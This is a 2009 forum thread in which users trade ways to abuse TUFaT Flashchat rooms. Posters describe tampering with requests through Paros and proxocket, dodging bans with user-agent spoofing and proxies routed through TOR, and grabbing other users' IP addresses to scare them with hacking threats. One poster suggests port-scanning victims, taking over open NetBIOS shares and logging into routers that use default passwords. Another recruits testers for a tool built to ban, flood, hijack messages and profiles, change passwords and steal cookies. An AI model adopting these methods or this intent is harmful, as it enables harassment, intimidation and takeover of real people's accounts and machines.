you can also use proxocket. it is harder to use, but if you know how to compile it and the right part of code, then all you need is to compile the .dll with right filter and then drop it into your firefox folder and it does all the replacing you want.

i can't remember, but i think flashchat checked for the packet's checksum, so it means that proxocket doesn't work unless you make another filter to change checksum (it is the sum of the data you send, which is set by paros..etc tools, like tamper data says "change checksum to xxx" or something like that). so in proxocket you have to make the filter manually. it also messes up your writing..so you can only say known length words i think.
if i'm right about checksum, then proxocket is not good for banning ..etc, but it is good for ringing bell for example, where you can make a custom filter, so for example when you say "ring/ring" (or whatever you want), then it rings the bell.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be banning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha
crakrboy
Newbie..
Newbie..
Posts: 1
Joined: Wed Jun 24, 2009 11:07 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by crakrboy »

jimmyx02 wrote: ok now i know how to use paros and tamper well...i used the user switch agent and now i can go in with firefox. yea they are total idiots to be banning a browser looool
thx for ur help anyway...this tamper data hole can be fixed with one code haha
dude i had same problem as you did, paros did the job? you must be some genius to get them to ban firefox ...you said it could be fixed with one code, is that true?

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

haha no i aint no genius they just too stupid...yea i keep an eye on the makers of the chat system and they came up with an update that will fix it with one code....this is a good place to keep an eye on wat the creators are doing http://forum.tufat.com/

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

what did they fix exactly ?
btw you can also do "/whois" command using the admin privileges exploit to see somebody's IP, if they so stupid that they ban firefox, then you can scare the shit out of them by telling them their own ip and saying that you gonna hack them. usually it works so well.

also long time ago when i first started hacking tufat flashchat, they had a newer version, but it did not work. well it worked, but you were unable to change any settings at all. as soon as you changed something (like time settings..etc), then the chat did not load.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

yea i know /profile works too instead of /whois to show ip i tried that they aint that scared of it lool....these guys have tried everything to block me including blocking firefox and blocking proxies from entering their site...but once they realized i got through after they blocked proxies they unblocked it.
Last edited by jimmyx02 on Sat Jun 27, 2009 5:12 am, edited 1 time in total.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

as about proxies, you can easily use TOR and then read TOR / Vidalia - how to use specific server/s as exit node. there's thousands of proxy servers and you can set any country as exit node, then you can use paros, webscarab and even burp suite i think to double route. so first your fox connects to your proxy and then proxy connects to TOR.

this is still flashchat topic, but if you get somebody's IP, you can scan it for open ports, lot of ppl have their NetBIOS ports open which allows you to basically get full control over pc or you can get access to their router and ban them from their own router or something (lot of ppl have default admin user and name in their router).

kula: why exactly that site name is not right ?
if somebody keeps messing with your chatroom, then there is a good reason for that (usually is). I first started working on flashchat when i got booted and banned from one chat i used to go to, because one stupid girl started to blame me and everybody believed her not me, so i took steps.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

i only removed it to protect the member not the chatroom.
this is going totally offtopic, do not post such things here, it is still flashchat exploits topic.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by jimmyx02 »

ok ill run some tests on the router ban trick ill get back to u if anything....as for king or wat ever ur name is why not ask me to remove the site link, im the one that posted it lool...site link stays on!!! i will add another later

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

router ban trick ?
as i mentioned, tools like burp suite, webscarab ..etc allows double proxying (or how to call it). firefox > webscarab > proxy

further offtopic posts will be deleted from this topic
dark_lord_tnt
Allie
Allie
Posts: 45
Joined: Sat Jul 04, 2009 5:51 pm

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by dark_lord_tnt »

I need a few Beta Testers as well as Contributors to a continuation of luigi's Flashchatz.. The project involves an upgrade based on the original concept. It will basically be a windows application that will exploit all of tufat's flaws. The source is closed but will be given to all contributing coders who are testers.. Testers are required to test the app in all situations as well as test any upgrades made to it, provide feedback to coders so that it can reach its full potential.. it's in VB .NET 2005. Currently there are no members of this project besides me. I also require someone to host and distribute the app. Future projects as well. If interested please contact me.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

so you planning to implant all the exploits ive found into it ? for example you can choose "ban" and then user and hit "go" or "do it" or whatever and it bans the person from chat ?
im not directly interested in it anymore, but you can add me to msn (i will pm you on site, not here, cuz forum's pm does not work) and i can test and help whenever im up for it, but no promises.

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by dark_lord_tnt »

Yeah basically everything the Admins can do and a lot more.. Think of it as a windows chat client.
1.) connects a user account
2.) retrieves all info, including users, ids, rooms, and main chat log (yeah it even brings up the log)
3.) send message to main , or to a user
4.) get user id,
5.) send urgent message

The above is already implemented and works!!!

Yet to implement (proof of concept and trial works for these)
6.) Inject Image in main chat (proof of concept works)
7.) Inject Image in Invite (proof of concept works)
8.) Mass Unignore bombs single or multiple user (proof of concept works and better than i thought almost like a DDOS attack)
9.) Mass Invite attack on single or multiple user (with Option image injection) .... works just like the above
10.) Kick User
11.) Kick Room
12.) Ban User
13.) Ban Ip
14.) Unban User / ip
15.) Room alert / chat alert
16.) Move User to any room
17.) Gag
18.) Room empty& flood

These work in theory
19.) accept pm messages
20.) hijack pm messages
21.) Hijack user message and change contents
22.) Hijack user profile and customize it
23.) Customize your own profile with exploit
24.) get user email / change password ..

e.g exploited profile...

http://chat.smstt.com/profile.php?user=18663

Re: Flashchat exploits - flashchatz and more ! boot, ban..etc !

Post by Sethioz »

few ideas:

1. Retrieve all users IPs (proof of concept works) and save into a file maybe. (works with my admin privilege exploit and /whois)
2. Steal user's cookie - in theory it should work if you know how to write a cookie stealer and implant it into a message or smile.
i think it is something like your hijack user profile, or is it ? or is it the user id ?
3. talk under other names
a standalone feature, which will allow you to choose a victim from list and talk under that name (with autoupdate which sees who enters room). this can be done either by stealing the ID or cookie. i successfully talked under other name, but i can't remember what i used, id or whole cookie.